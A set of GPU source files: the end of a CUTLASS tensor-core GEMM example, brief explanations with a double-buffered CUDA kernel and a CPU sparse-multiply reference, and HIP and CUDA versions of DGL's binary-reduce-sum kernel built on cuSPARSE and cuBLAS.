This becomes the vector width of // math instructions in the epilogue too ElementAccumulator, // <- data type of accumulator ElementComputeEpilogue>; // <- data type for alpha/beta in linear combination function // Number of pipelines you want to use constexpr int NumStages = 2; using Gemm = cutlass::gemm::device::Gemm<ElementInputA, LayoutInputA, ElementInputB, LayoutInputB, ElementOutput, LayoutOutput, ElementAccumulator, MMAOp, SmArch, ShapeMMAThreadBlock, ShapeMMAWarp, ShapeMMAOp, EpilogueOp, SwizzleThreadBlock, NumStages>; int main() { cudaDeviceProp props; CUDA_CHECK(cudaGetDeviceProperties(&props, 0)); if (!(props.major >= 7 && props.minor >= 5)) { std::cerr << "Turing Tensor Ops must be run on a machine with compute capability at least 75." << std::endl; return 0; } const int length_m = 5120; const int length_n = 4096; const int length_k = 4096; // Create a tuple of problem size for matrix multiplication cutlass::gemm::GemmCoord problem_size(length_m, length_n, length_k); // Initialize tensors using CUTLASS helper functions cutlass::HostTensor<ElementInputA, LayoutInputA> tensor_a( problem_size.mk()); // <- Create matrix A with dimensions M x K cutlass::HostTensor<ElementInputB, LayoutInputB> tensor_b( problem_size.nk()); // <- Create matrix B with dimensions N x K cutlass::HostTensor<ElementOutput, LayoutOutput> tensor_c( problem_size.mn()); // <- Create matrix C with dimensions M x N cutlass::HostTensor<ElementOutput, LayoutOutput> tensor_d( problem_size.mn()); // <- Create matrix D with dimensions M x N used to store output from // CUTLASS kernel cutlass::HostTensor<ElementOutput, LayoutOutput> tensor_ref_d( problem_size.mn()); // <- Create matrix D with dimensions M x N used to store output from // reference kernel // Fill input and output matrices on host using CUTLASS helper functions cutlass::reference::host::TensorFillRandomUniform( tensor_a.host_view(), 1, ElementInputA(4), ElementInputA(-4), 0); // <- Fill matrix A on host with uniform-distribution random data cutlass::reference::host::TensorFillRandomUniform( tensor_b.host_view(), 1, ElementInputB(4), ElementInputB(-4), 0); // <- Fill matrix B on host with uniform-distribution random data cutlass::reference::host::TensorFillRandomUniform( tensor_c.host_view(), 1, ElementOutput(4), ElementOutput(-4), 0); // <- Fill matrix C on host with uniform-distribution random data cutlass::reference::host::TensorFill( tensor_d.host_view()); // <- fill matrix D on host with zeros cutlass::reference::host::TensorFill( tensor_ref_d.host_view()); // <- fill matrix D for reference on host with zeros // Copy data from host to GPU tensor_a.sync_device(); tensor_b.sync_device(); tensor_c.sync_device(); tensor_d.sync_device(); tensor_ref_d.sync_device(); // Initialize alpha and beta for dot product computation ElementComputeEpilogue alpha = ElementComputeEpilogue(1); ElementComputeEpilogue beta = ElementComputeEpilogue(0); // Split K dimension into 1 partitions int split_k_slices = 1; // Create a tuple of gemm kernel arguments. 
This is later passed as arguments to launch // instantiated CUTLASS kernel typename Gemm::Arguments arguments{problem_size, // <- problem size of matrix multiplication tensor_a.device_ref(), // <- reference to matrix A on device tensor_b.device_ref(), // <- reference to matrix B on device tensor_c.device_ref(), // <- reference to matrix C on device tensor_d.device_ref(), // <- reference to matrix D on device {alpha, beta}, // <- tuple of alpha and beta split_k_slices}; // <- k-dimension split factor // Using the arguments, query for extra workspace required for matrix multiplication computation size_t workspace_size = Gemm::get_workspace_size(arguments); // Allocate workspace memory cutlass::device_memory::allocation<uint8_t> workspace(workspace_size); // Instantiate CUTLASS kernel depending on templates Gemm gemm_op; // Initialize CUTLASS kernel with arguments and workspace pointer cutlass::Status status = gemm_op.initialize(arguments, workspace.get()); CUTLASS_CHECK(status); // Launch initialized CUTLASS kernel status = gemm_op(); CUTLASS_CHECK(status); // Create instantiation for device reference gemm kernel cutlass::reference::device::Gemm<ElementInputA, LayoutInputA, ElementInputB, LayoutInputB, ElementOutput, LayoutOutput, ElementComputeEpilogue, ElementComputeEpilogue> gemm_device; // Launch device reference gemm kernel gemm_device(problem_size, alpha, tensor_a.device_ref(), tensor_b.device_ref(), beta, tensor_c.device_ref(), tensor_ref_d.device_ref()); // Wait for kernels to finish cudaDeviceSynchronize(); // Copy output data from CUTLASS and reference kernel to host for comparison tensor_d.sync_host(); tensor_ref_d.sync_host(); // Check if output from CUTLASS kernel and reference kernel are equal or not std::cout << (cutlass::reference::host::TensorEquals(tensor_d.host_view(), tensor_ref_d.host_view()) ? "Passed" : "Failed") << std::endl; CUTLASS_CHECK(status); return 0; }
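The two-stage pipeline mentioned in the comments above (NumStages = 2) is essentially software double buffering: while the math stage consumes the tile already in shared memory, the next tile is being staged from global memory. The kernel below is a deliberately simplified, hypothetical illustration of that overlap using a dot-product-style workload; it is not how CUTLASS implements its pipeline (which also stages through registers), but it shows the buffer-swap and synchronization pattern.

#define TILE 256  // launch with blockDim.x == TILE

// Double-buffered main loop: stage tile t+1 while computing on tile t.
__global__ void pipelined_dot(const float* __restrict__ x,   // num_tiles * TILE values per block
                              const float* __restrict__ w,   // TILE weights reused for every tile
                              float* __restrict__ out,
                              int num_tiles) {
  __shared__ float smem[2][TILE];
  const int tid = threadIdx.x;
  const float* block_x = x + (size_t)blockIdx.x * num_tiles * TILE;
  float acc = 0.f;

  // Prologue: stage the first tile into buffer 0.
  smem[0][tid] = block_x[tid];
  __syncthreads();

  for (int t = 0; t < num_tiles; ++t) {
    const int cur = t & 1, nxt = cur ^ 1;
    // Stage the next tile into the other buffer while 'cur' is consumed below.
    if (t + 1 < num_tiles) {
      smem[nxt][tid] = block_x[(t + 1) * TILE + tid];
    }
    // "Math" stage: every thread reads the whole current tile (like a GEMM warp tile).
    for (int j = 0; j < TILE; ++j) {
      acc += smem[cur][j] * w[j];
    }
    __syncthreads();  // 'nxt' must be fully written (and 'cur' fully read) before the swap
  }
  out[(size_t)blockIdx.x * blockDim.x + tid] = acc;
}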
4506e4f74fa4cb5cf8fe511f46ecbeca71df0411.hip
// !!! This is a file automatically generated by hipify!!! /*! * Copyright (c) 2019 by Contributors * \file kernel/cuda/binary_reduce_sum.cu * \brief CUDA kernels for binary reduce sum */ #include <dgl/runtime/device_api.h> #include "../../runtime/cuda/cuda_common.h" #include "binary_reduce_impl_hip.cuh" #include "./backward_binary_reduce_impl.cuh" #include "../utils.h" #include "../csr_interface.h" using minigun::advance::RuntimeConfig; using Csr = minigun::Csr<int32_t>; namespace dgl { namespace kernel { namespace cuda { // specialization for cusparse template <typename DType> hipsparseStatus_t Xcsrmm2(hipsparseHandle_t handle, hipsparseOperation_t transA, hipsparseOperation_t transB, int m, int n, int k, int nnz, const DType* alpha, const hipsparseMatDescr_t descrA, const DType* csrValA, const int* csrRowPtrA, const int* csrColIndA, const DType* B, int ldb, const DType* beta, DType* C, int ldc) { LOG(INFO) << "Not supported dtype"; return HIPSPARSE_STATUS_EXECUTION_FAILED; } template <> hipsparseStatus_t Xcsrmm2<float>(hipsparseHandle_t handle, hipsparseOperation_t transA, hipsparseOperation_t transB, int m, int n, int k, int nnz, const float* alpha, const hipsparseMatDescr_t descrA, const float* csrValA, const int* csrRowPtrA, const int* csrColIndA, const float* B, int ldb, const float* beta, float* C, int ldc) { return hipsparseScsrmm2(handle, transA, transB, m, n, k, nnz, alpha, descrA, csrValA, csrRowPtrA, csrColIndA, B, ldb, beta, C, ldc); } template <> hipsparseStatus_t Xcsrmm2<double>(hipsparseHandle_t handle, hipsparseOperation_t transA, hipsparseOperation_t transB, int m, int n, int k, int nnz, const double* alpha, const hipsparseMatDescr_t descrA, const double* csrValA, const int* csrRowPtrA, const int* csrColIndA, const double* B, int ldb, const double* beta, double* C, int ldc) { return hipsparseDcsrmm2(handle, transA, transB, m, n, k, nnz, alpha, descrA, csrValA, csrRowPtrA, csrColIndA, B, ldb, beta, C, ldc); } template <typename DType> hipblasStatus_t Xgeam(hipblasHandle_t handle, hipblasOperation_t transa, hipblasOperation_t transb, int m, int n, const DType* alpha, const DType* A, int lda, const DType* beta, const DType* B, int ldb, DType* C, int ldc) { LOG(INFO) << "Not supported dtype"; return HIPBLAS_STATUS_EXECUTION_FAILED; } template <> hipblasStatus_t Xgeam<float>(hipblasHandle_t handle, hipblasOperation_t transa, hipblasOperation_t transb, int m, int n, const float* alpha, const float* A, int lda, const float* beta, const float* B, int ldb, float* C, int ldc) { return hipblasSgeam(handle, transa, transb, m, n, alpha, A, lda, beta, B, ldb, C, ldc); } template <> hipblasStatus_t Xgeam<double>(hipblasHandle_t handle, hipblasOperation_t transa, hipblasOperation_t transb, int m, int n, const double* alpha, const double* A, int lda, const double* beta, const double* B, int ldb, double* C, int ldc) { return hipblasDgeam(handle, transa, transb, m, n, alpha, A, lda, beta, B, ldb, C, ldc); } template <typename DType> void CusparseCsrmm2( const RuntimeConfig& rtcfg, const Csr& csr, const DType* B_data, DType* C_data, int out_size, int x_length) { // We use csrmm2 to perform following operation: // C = A x B, where A is a sparse matrix in csr format, B is the dense matrix for node // feature tensor. However, since cusparse only supports column-major, while our tensor // is stored in row-major, the actual computation is: // C = trans(A x trans(B)). // Currently, we use cublasXgeam to implement transposition and allocate intermediate // workspace memory for this. 
// TODO(minjie): The given CSR could potentially represent a bipartite graph (e.g. in the // case of nodeflow). Currently, we don't have bipartite graph support. Here is a small // hack. In the python side, we create a CSR that includes both the source and destination // nodes in the bipartite graph (so it is still square matrix). Here, when multiplying // this sparse matrix, we specify the number of rows (the `m` here) to be equal to the // number of rows of the output tensor (i.e, the `out_size`). // In the future, we should make sure the number of rows of the given csr is equal // to out_size (a.k.a the given csr is a rectangle matrix). const int m = out_size; const int k = csr.row_offsets.length - 1; const int n = x_length; const int nnz = csr.column_indices.length; const DType alpha = 1.0; const DType beta = 0.0; // device auto device = runtime::DeviceAPI::Get(rtcfg.ctx); auto* thr_entry = runtime::CUDAThreadEntry::ThreadLocal(); // allocate cusparse handle if needed if (!thr_entry->cusparse_handle) { CUSPARSE_CALL(hipsparseCreate(&(thr_entry->cusparse_handle))); } CUSPARSE_CALL(hipsparseSetStream(thr_entry->cusparse_handle, rtcfg.stream)); // allocate matrix for temporary transposed output DType* trans_out = static_cast<DType*>(device->AllocWorkspace(rtcfg.ctx, m * n * sizeof(DType))); // all one data array DType* valptr = static_cast<DType*>(device->AllocWorkspace(rtcfg.ctx, nnz * sizeof(DType))); utils::Fill<kDLGPU>(rtcfg.ctx, valptr, nnz, static_cast<DType>(1.)); hipsparseMatDescr_t descr; CUSPARSE_CALL(hipsparseCreateMatDescr(&descr)); CUSPARSE_CALL(hipsparseSetMatType(descr, HIPSPARSE_MATRIX_TYPE_GENERAL)); CUSPARSE_CALL(hipsparseSetMatIndexBase(descr, HIPSPARSE_INDEX_BASE_ZERO)); CUSPARSE_CALL(Xcsrmm2<DType>( thr_entry->cusparse_handle, HIPSPARSE_OPERATION_NON_TRANSPOSE, HIPSPARSE_OPERATION_TRANSPOSE, m, n, k, nnz, &alpha, descr, valptr, csr.row_offsets.data, csr.column_indices.data, B_data, n, &beta, trans_out, m)); device->FreeWorkspace(rtcfg.ctx, valptr); // transpose the output matrix if (!thr_entry->cublas_handle) { CUBLAS_CALL(hipblasCreate(&(thr_entry->cublas_handle))); } CUBLAS_CALL(hipblasSetStream(thr_entry->cublas_handle, rtcfg.stream)); CUBLAS_CALL(Xgeam<DType>( thr_entry->cublas_handle, HIPBLAS_OP_T, HIPBLAS_OP_N, n, m, &alpha, trans_out, m, &beta, nullptr, n, C_data, n)); device->FreeWorkspace(rtcfg.ctx, trans_out); } // forward template <typename DType> void FallbackCallBinaryReduce( const RuntimeConfig& rtcfg, const CSRWrapper& graph, GData<int32_t, DType>* gdata) { constexpr int XPU = kDLGPU; typedef int32_t Idx; typedef SelectSrc LeftSelector; typedef SelectNone RightSelector; typedef BinaryUseLhs<DType> BinaryOp; typedef ReduceSum<kDLGPU, DType> Reducer; typedef cuda::FunctorsTempl<Idx, DType, LeftSelector, RightSelector, BinaryOp, Reducer> Functors; typedef cuda::BinaryReduce<Idx, DType, Functors> UDF; // csr auto outcsr = graph.GetOutCSRMatrix(); minigun::Csr<Idx> csr = utils::CreateCsr<Idx>(outcsr.indptr, outcsr.indices); // If the user-given mapping is none and the target is edge data, we need to // replace the mapping by the edge ids in the csr graph so that the edge // data is correctly read/written. 
if (LeftSelector::target == binary_op::kEdge && gdata->lhs_mapping == nullptr) { gdata->lhs_mapping = static_cast<Idx*>(outcsr.data->data); } if (RightSelector::target == binary_op::kEdge && gdata->rhs_mapping == nullptr) { gdata->rhs_mapping = static_cast<Idx*>(outcsr.data->data); } if (OutSelector<Reducer>::Type::target == binary_op::kEdge && gdata->out_mapping == nullptr) { gdata->out_mapping = static_cast<Idx*>(outcsr.data->data); } // TODO(minjie): allocator minigun::advance::Advance<XPU, Idx, cuda::AdvanceConfig, GData<Idx, DType>, UDF>( rtcfg, csr, gdata, minigun::IntArray1D<Idx>()); } template <typename DType> void FallbackCallBackwardBinaryReduce( const RuntimeConfig& rtcfg, const CSRWrapper& graph, BackwardGData<int32_t, DType>* gdata) { constexpr int XPU = kDLGPU; constexpr int Mode = binary_op::kGradLhs; typedef int32_t Idx; typedef SelectSrc LeftSelector; typedef SelectNone RightSelector; typedef BinaryUseLhs<DType> BinaryOp; typedef ReduceSum<kDLGPU, DType> Reducer; // For backward computation, we use reverse csr and switch dst and src. // This benefits the most common src_op_edge or copy_src case, because the // gradients of src are now aggregated into destination buffer to reduce // competition of atomic add. auto incsr = graph.GetInCSRMatrix(); minigun::Csr<Idx> csr = utils::CreateCsr<Idx>(incsr.indptr, incsr.indices); typedef cuda::BackwardFunctorsTempl<Idx, DType, typename SwitchSrcDst<LeftSelector>::Type, typename SwitchSrcDst<RightSelector>::Type, BinaryOp, Reducer> Functors; typedef cuda::BackwardBinaryReduce<Mode, Idx, DType, Functors> UDF; // If the user-given mapping is none and the target is edge data, we need to // replace the mapping by the edge ids in the csr graph so that the edge // data is correctly read/written. if (LeftSelector::target == binary_op::kEdge && gdata->lhs_mapping == nullptr) { gdata->lhs_mapping = static_cast<Idx*>(incsr.data->data); } if (RightSelector::target == binary_op::kEdge && gdata->rhs_mapping == nullptr) { gdata->rhs_mapping = static_cast<Idx*>(incsr.data->data); } if (OutSelector<Reducer>::Type::target == binary_op::kEdge && gdata->out_mapping == nullptr) { gdata->out_mapping = static_cast<Idx*>(incsr.data->data); } // TODO(minjie): allocator minigun::advance::Advance<XPU, Idx, cuda::AdvanceConfig, BackwardGData<Idx, DType>, UDF>( rtcfg, csr, gdata, minigun::IntArray1D<Idx>()); } } // namespace cuda template <> void CallBinaryReduce<kDLGPU, int32_t, float, SelectSrc, SelectNone, BinaryUseLhs<float>, ReduceSum<kDLGPU, float>>( const RuntimeConfig& rtcfg, const CSRWrapper& graph, GData<int32_t, float>* gdata) { if (gdata->lhs_mapping || gdata->rhs_mapping || gdata->out_mapping) { cuda::FallbackCallBinaryReduce<float>(rtcfg, graph, gdata); } else { // cusparse use rev csr for csrmm auto incsr = graph.GetInCSRMatrix(); Csr csr = utils::CreateCsr<int32_t>(incsr.indptr, incsr.indices); cuda::CusparseCsrmm2(rtcfg, csr, gdata->lhs_data, gdata->out_data, gdata->out_size, gdata->x_length); } } template <> void CallBinaryReduce<kDLGPU, int32_t, double, SelectSrc, SelectNone, BinaryUseLhs<double>, ReduceSum<kDLGPU, double>>( const RuntimeConfig& rtcfg, const CSRWrapper& graph, GData<int32_t, double>* gdata) { if (gdata->lhs_mapping || gdata->rhs_mapping || gdata->out_mapping) { cuda::FallbackCallBinaryReduce<double>(rtcfg, graph, gdata); } else { // cusparse use rev csr for csrmm auto incsr = graph.GetInCSRMatrix(); Csr csr = utils::CreateCsr<int32_t>(incsr.indptr, incsr.indices); cuda::CusparseCsrmm2(rtcfg, csr, gdata->lhs_data, 
gdata->out_data, gdata->out_size, gdata->x_length); } } // backward template <> void CallBackwardBinaryReduce<kDLGPU, binary_op::kGradLhs, int32_t, float, SelectSrc, SelectNone, BinaryUseLhs<float>, ReduceSum<kDLGPU, float>>( const RuntimeConfig& rtcfg, const CSRWrapper& graph, BackwardGData<int32_t, float>* gdata) { if (gdata->lhs_mapping || gdata->rhs_mapping || gdata->out_mapping) { cuda::FallbackCallBackwardBinaryReduce<float>(rtcfg, graph, gdata); } else { auto outcsr = graph.GetOutCSRMatrix(); Csr csr = utils::CreateCsr<int32_t>(outcsr.indptr, outcsr.indices); cuda::CusparseCsrmm2(rtcfg, csr, gdata->grad_out_data, gdata->grad_lhs_data, gdata->out_size, gdata->x_length); } } template <> void CallBackwardBinaryReduce<kDLGPU, binary_op::kGradLhs, int32_t, double, SelectSrc, SelectNone, BinaryUseLhs<double>, ReduceSum<kDLGPU, double>>( const RuntimeConfig& rtcfg, const CSRWrapper& graph, BackwardGData<int32_t, double>* gdata) { if (gdata->lhs_mapping || gdata->rhs_mapping || gdata->out_mapping) { cuda::FallbackCallBackwardBinaryReduce<double>(rtcfg, graph, gdata); } else { auto outcsr = graph.GetOutCSRMatrix(); Csr csr = utils::CreateCsr<int32_t>(outcsr.indptr, outcsr.indices); cuda::CusparseCsrmm2(rtcfg, csr, gdata->grad_out_data, gdata->grad_lhs_data, gdata->out_size, gdata->x_length); } } // generate definitions #define REDUCER ReduceSum #define XPU kDLGPU #define IDX int32_t EVAL(GEN_DTYPE, GEN_OP_TARGET, GEN_DEFINE); EVAL(GEN_BACKWARD_MODE, GEN_DTYPE, GEN_OP_TARGET, GEN_BACKWARD_DEFINE); } // namespace kernel } // namespace dgl
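Since the CSR values are filled with ones above, the csrmm2 call computes C = A x B where each output row is simply the sum of the feature rows of that node's neighbours. The function below is a hypothetical CPU reference for that product with row-major dense B and C; it is meant only to spell out the math and deliberately ignores the column-major/transpose plumbing that the cuSPARSE path needs.

#include <cstdint>
#include <vector>

// Reference SpMM: C = A * B with A an m x k sparse matrix in CSR form whose
// stored values are all 1 (as in the kernel above), B dense k x n row-major,
// C dense m x n row-major.
void csr_spmm_reference(int m, int n,
                        const std::vector<int32_t>& row_offsets,     // size m + 1
                        const std::vector<int32_t>& column_indices,  // size nnz
                        const std::vector<float>& B,
                        std::vector<float>& C) {
  for (int i = 0; i < m; ++i) {
    for (int j = 0; j < n; ++j) C[i * n + j] = 0.f;
    for (int32_t e = row_offsets[i]; e < row_offsets[i + 1]; ++e) {
      const int32_t nbr = column_indices[e];
      for (int j = 0; j < n; ++j) {
        C[i * n + j] += B[nbr * n + j];  // stored value is 1, so this is a plain feature sum
      }
    }
  }
}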
4506e4f74fa4cb5cf8fe511f46ecbeca71df0411.cu
/*! * Copyright (c) 2019 by Contributors * \file kernel/cuda/binary_reduce_sum.cu * \brief CUDA kernels for binary reduce sum */ #include <dgl/runtime/device_api.h> #include "../../runtime/cuda/cuda_common.h" #include "./binary_reduce_impl.cuh" #include "./backward_binary_reduce_impl.cuh" #include "../utils.h" #include "../csr_interface.h" using minigun::advance::RuntimeConfig; using Csr = minigun::Csr<int32_t>; namespace dgl { namespace kernel { namespace cuda { // specialization for cusparse template <typename DType> cusparseStatus_t Xcsrmm2(cusparseHandle_t handle, cusparseOperation_t transA, cusparseOperation_t transB, int m, int n, int k, int nnz, const DType* alpha, const cusparseMatDescr_t descrA, const DType* csrValA, const int* csrRowPtrA, const int* csrColIndA, const DType* B, int ldb, const DType* beta, DType* C, int ldc) { LOG(INFO) << "Not supported dtype"; return CUSPARSE_STATUS_EXECUTION_FAILED; } template <> cusparseStatus_t Xcsrmm2<float>(cusparseHandle_t handle, cusparseOperation_t transA, cusparseOperation_t transB, int m, int n, int k, int nnz, const float* alpha, const cusparseMatDescr_t descrA, const float* csrValA, const int* csrRowPtrA, const int* csrColIndA, const float* B, int ldb, const float* beta, float* C, int ldc) { return cusparseScsrmm2(handle, transA, transB, m, n, k, nnz, alpha, descrA, csrValA, csrRowPtrA, csrColIndA, B, ldb, beta, C, ldc); } template <> cusparseStatus_t Xcsrmm2<double>(cusparseHandle_t handle, cusparseOperation_t transA, cusparseOperation_t transB, int m, int n, int k, int nnz, const double* alpha, const cusparseMatDescr_t descrA, const double* csrValA, const int* csrRowPtrA, const int* csrColIndA, const double* B, int ldb, const double* beta, double* C, int ldc) { return cusparseDcsrmm2(handle, transA, transB, m, n, k, nnz, alpha, descrA, csrValA, csrRowPtrA, csrColIndA, B, ldb, beta, C, ldc); } template <typename DType> cublasStatus_t Xgeam(cublasHandle_t handle, cublasOperation_t transa, cublasOperation_t transb, int m, int n, const DType* alpha, const DType* A, int lda, const DType* beta, const DType* B, int ldb, DType* C, int ldc) { LOG(INFO) << "Not supported dtype"; return CUBLAS_STATUS_EXECUTION_FAILED; } template <> cublasStatus_t Xgeam<float>(cublasHandle_t handle, cublasOperation_t transa, cublasOperation_t transb, int m, int n, const float* alpha, const float* A, int lda, const float* beta, const float* B, int ldb, float* C, int ldc) { return cublasSgeam(handle, transa, transb, m, n, alpha, A, lda, beta, B, ldb, C, ldc); } template <> cublasStatus_t Xgeam<double>(cublasHandle_t handle, cublasOperation_t transa, cublasOperation_t transb, int m, int n, const double* alpha, const double* A, int lda, const double* beta, const double* B, int ldb, double* C, int ldc) { return cublasDgeam(handle, transa, transb, m, n, alpha, A, lda, beta, B, ldb, C, ldc); } template <typename DType> void CusparseCsrmm2( const RuntimeConfig& rtcfg, const Csr& csr, const DType* B_data, DType* C_data, int out_size, int x_length) { // We use csrmm2 to perform following operation: // C = A x B, where A is a sparse matrix in csr format, B is the dense matrix for node // feature tensor. However, since cusparse only supports column-major, while our tensor // is stored in row-major, the actual computation is: // C = trans(A x trans(B)). // Currently, we use cublasXgeam to implement transposition and allocate intermediate // workspace memory for this. // TODO(minjie): The given CSR could potentially represent a bipartite graph (e.g. 
in the // case of nodeflow). Currently, we don't have bipartite graph support. Here is a small // hack. In the python side, we create a CSR that includes both the source and destination // nodes in the bipartite graph (so it is still square matrix). Here, when multiplying // this sparse matrix, we specify the number of rows (the `m` here) to be equal to the // number of rows of the output tensor (i.e, the `out_size`). // In the future, we should make sure the number of rows of the given csr is equal // to out_size (a.k.a the given csr is a rectangle matrix). const int m = out_size; const int k = csr.row_offsets.length - 1; const int n = x_length; const int nnz = csr.column_indices.length; const DType alpha = 1.0; const DType beta = 0.0; // device auto device = runtime::DeviceAPI::Get(rtcfg.ctx); auto* thr_entry = runtime::CUDAThreadEntry::ThreadLocal(); // allocate cusparse handle if needed if (!thr_entry->cusparse_handle) { CUSPARSE_CALL(cusparseCreate(&(thr_entry->cusparse_handle))); } CUSPARSE_CALL(cusparseSetStream(thr_entry->cusparse_handle, rtcfg.stream)); // allocate matrix for temporary transposed output DType* trans_out = static_cast<DType*>(device->AllocWorkspace(rtcfg.ctx, m * n * sizeof(DType))); // all one data array DType* valptr = static_cast<DType*>(device->AllocWorkspace(rtcfg.ctx, nnz * sizeof(DType))); utils::Fill<kDLGPU>(rtcfg.ctx, valptr, nnz, static_cast<DType>(1.)); cusparseMatDescr_t descr; CUSPARSE_CALL(cusparseCreateMatDescr(&descr)); CUSPARSE_CALL(cusparseSetMatType(descr, CUSPARSE_MATRIX_TYPE_GENERAL)); CUSPARSE_CALL(cusparseSetMatIndexBase(descr, CUSPARSE_INDEX_BASE_ZERO)); CUSPARSE_CALL(Xcsrmm2<DType>( thr_entry->cusparse_handle, CUSPARSE_OPERATION_NON_TRANSPOSE, CUSPARSE_OPERATION_TRANSPOSE, m, n, k, nnz, &alpha, descr, valptr, csr.row_offsets.data, csr.column_indices.data, B_data, n, &beta, trans_out, m)); device->FreeWorkspace(rtcfg.ctx, valptr); // transpose the output matrix if (!thr_entry->cublas_handle) { CUBLAS_CALL(cublasCreate(&(thr_entry->cublas_handle))); } CUBLAS_CALL(cublasSetStream(thr_entry->cublas_handle, rtcfg.stream)); CUBLAS_CALL(Xgeam<DType>( thr_entry->cublas_handle, CUBLAS_OP_T, CUBLAS_OP_N, n, m, &alpha, trans_out, m, &beta, nullptr, n, C_data, n)); device->FreeWorkspace(rtcfg.ctx, trans_out); } // forward template <typename DType> void FallbackCallBinaryReduce( const RuntimeConfig& rtcfg, const CSRWrapper& graph, GData<int32_t, DType>* gdata) { constexpr int XPU = kDLGPU; typedef int32_t Idx; typedef SelectSrc LeftSelector; typedef SelectNone RightSelector; typedef BinaryUseLhs<DType> BinaryOp; typedef ReduceSum<kDLGPU, DType> Reducer; typedef cuda::FunctorsTempl<Idx, DType, LeftSelector, RightSelector, BinaryOp, Reducer> Functors; typedef cuda::BinaryReduce<Idx, DType, Functors> UDF; // csr auto outcsr = graph.GetOutCSRMatrix(); minigun::Csr<Idx> csr = utils::CreateCsr<Idx>(outcsr.indptr, outcsr.indices); // If the user-given mapping is none and the target is edge data, we need to // replace the mapping by the edge ids in the csr graph so that the edge // data is correctly read/written. 
if (LeftSelector::target == binary_op::kEdge && gdata->lhs_mapping == nullptr) { gdata->lhs_mapping = static_cast<Idx*>(outcsr.data->data); } if (RightSelector::target == binary_op::kEdge && gdata->rhs_mapping == nullptr) { gdata->rhs_mapping = static_cast<Idx*>(outcsr.data->data); } if (OutSelector<Reducer>::Type::target == binary_op::kEdge && gdata->out_mapping == nullptr) { gdata->out_mapping = static_cast<Idx*>(outcsr.data->data); } // TODO(minjie): allocator minigun::advance::Advance<XPU, Idx, cuda::AdvanceConfig, GData<Idx, DType>, UDF>( rtcfg, csr, gdata, minigun::IntArray1D<Idx>()); } template <typename DType> void FallbackCallBackwardBinaryReduce( const RuntimeConfig& rtcfg, const CSRWrapper& graph, BackwardGData<int32_t, DType>* gdata) { constexpr int XPU = kDLGPU; constexpr int Mode = binary_op::kGradLhs; typedef int32_t Idx; typedef SelectSrc LeftSelector; typedef SelectNone RightSelector; typedef BinaryUseLhs<DType> BinaryOp; typedef ReduceSum<kDLGPU, DType> Reducer; // For backward computation, we use reverse csr and switch dst and src. // This benefits the most common src_op_edge or copy_src case, because the // gradients of src are now aggregated into destination buffer to reduce // competition of atomic add. auto incsr = graph.GetInCSRMatrix(); minigun::Csr<Idx> csr = utils::CreateCsr<Idx>(incsr.indptr, incsr.indices); typedef cuda::BackwardFunctorsTempl<Idx, DType, typename SwitchSrcDst<LeftSelector>::Type, typename SwitchSrcDst<RightSelector>::Type, BinaryOp, Reducer> Functors; typedef cuda::BackwardBinaryReduce<Mode, Idx, DType, Functors> UDF; // If the user-given mapping is none and the target is edge data, we need to // replace the mapping by the edge ids in the csr graph so that the edge // data is correctly read/written. if (LeftSelector::target == binary_op::kEdge && gdata->lhs_mapping == nullptr) { gdata->lhs_mapping = static_cast<Idx*>(incsr.data->data); } if (RightSelector::target == binary_op::kEdge && gdata->rhs_mapping == nullptr) { gdata->rhs_mapping = static_cast<Idx*>(incsr.data->data); } if (OutSelector<Reducer>::Type::target == binary_op::kEdge && gdata->out_mapping == nullptr) { gdata->out_mapping = static_cast<Idx*>(incsr.data->data); } // TODO(minjie): allocator minigun::advance::Advance<XPU, Idx, cuda::AdvanceConfig, BackwardGData<Idx, DType>, UDF>( rtcfg, csr, gdata, minigun::IntArray1D<Idx>()); } } // namespace cuda template <> void CallBinaryReduce<kDLGPU, int32_t, float, SelectSrc, SelectNone, BinaryUseLhs<float>, ReduceSum<kDLGPU, float>>( const RuntimeConfig& rtcfg, const CSRWrapper& graph, GData<int32_t, float>* gdata) { if (gdata->lhs_mapping || gdata->rhs_mapping || gdata->out_mapping) { cuda::FallbackCallBinaryReduce<float>(rtcfg, graph, gdata); } else { // cusparse use rev csr for csrmm auto incsr = graph.GetInCSRMatrix(); Csr csr = utils::CreateCsr<int32_t>(incsr.indptr, incsr.indices); cuda::CusparseCsrmm2(rtcfg, csr, gdata->lhs_data, gdata->out_data, gdata->out_size, gdata->x_length); } } template <> void CallBinaryReduce<kDLGPU, int32_t, double, SelectSrc, SelectNone, BinaryUseLhs<double>, ReduceSum<kDLGPU, double>>( const RuntimeConfig& rtcfg, const CSRWrapper& graph, GData<int32_t, double>* gdata) { if (gdata->lhs_mapping || gdata->rhs_mapping || gdata->out_mapping) { cuda::FallbackCallBinaryReduce<double>(rtcfg, graph, gdata); } else { // cusparse use rev csr for csrmm auto incsr = graph.GetInCSRMatrix(); Csr csr = utils::CreateCsr<int32_t>(incsr.indptr, incsr.indices); cuda::CusparseCsrmm2(rtcfg, csr, gdata->lhs_data, 
gdata->out_data, gdata->out_size, gdata->x_length); } } // backward template <> void CallBackwardBinaryReduce<kDLGPU, binary_op::kGradLhs, int32_t, float, SelectSrc, SelectNone, BinaryUseLhs<float>, ReduceSum<kDLGPU, float>>( const RuntimeConfig& rtcfg, const CSRWrapper& graph, BackwardGData<int32_t, float>* gdata) { if (gdata->lhs_mapping || gdata->rhs_mapping || gdata->out_mapping) { cuda::FallbackCallBackwardBinaryReduce<float>(rtcfg, graph, gdata); } else { auto outcsr = graph.GetOutCSRMatrix(); Csr csr = utils::CreateCsr<int32_t>(outcsr.indptr, outcsr.indices); cuda::CusparseCsrmm2(rtcfg, csr, gdata->grad_out_data, gdata->grad_lhs_data, gdata->out_size, gdata->x_length); } } template <> void CallBackwardBinaryReduce<kDLGPU, binary_op::kGradLhs, int32_t, double, SelectSrc, SelectNone, BinaryUseLhs<double>, ReduceSum<kDLGPU, double>>( const RuntimeConfig& rtcfg, const CSRWrapper& graph, BackwardGData<int32_t, double>* gdata) { if (gdata->lhs_mapping || gdata->rhs_mapping || gdata->out_mapping) { cuda::FallbackCallBackwardBinaryReduce<double>(rtcfg, graph, gdata); } else { auto outcsr = graph.GetOutCSRMatrix(); Csr csr = utils::CreateCsr<int32_t>(outcsr.indptr, outcsr.indices); cuda::CusparseCsrmm2(rtcfg, csr, gdata->grad_out_data, gdata->grad_lhs_data, gdata->out_size, gdata->x_length); } } // generate definitions #define REDUCER ReduceSum #define XPU kDLGPU #define IDX int32_t EVAL(GEN_DTYPE, GEN_OP_TARGET, GEN_DEFINE); EVAL(GEN_BACKWARD_MODE, GEN_DTYPE, GEN_OP_TARGET, GEN_BACKWARD_DEFINE); } // namespace kernel } // namespace dgl
